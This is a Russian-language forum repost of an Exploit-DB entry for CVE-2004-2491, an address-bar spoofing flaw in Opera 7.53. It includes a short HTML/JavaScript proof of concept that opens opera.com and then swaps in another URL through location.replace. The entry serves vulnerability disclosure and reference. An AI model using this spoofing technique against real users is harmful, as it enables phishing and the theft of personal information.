Exploit Opera Web Browser 7.53 - Location Replace URI Obfuscation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24325
Проверка EDB
  1. Пройдено
Автор
BITLANCE WINTER
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2004-2491
Дата публикации
2004-07-27
Opera Web Browser 7.53 - Location Replace URI Obfuscation
HTML:
source: https://www.securityfocus.com/bid/10810/info

Opera Web Browser is prone to a security weakness that may permit malicious web pages to spoof address bar information. This issue is due to a race condition error.

This issue may be leveraged by an attacker to display false information in the address bar of an unsuspecting user, allowing an attacker to present web pages to users that seem to be derived from a trusted location. This may facilitate phishing attacks; attempted theft of user information for the purpose of identity theft.

<script>
function fake() {
 oc=window.open('http://www.opera.com/', '','location=1');
 oc.location.replace('http://www.example.com');
}
[/script]
<a href="javascript:void(0);" onClick="fake()">http://www.opera.com/</a>
 
Источник
www.exploit-db.com

Похожие темы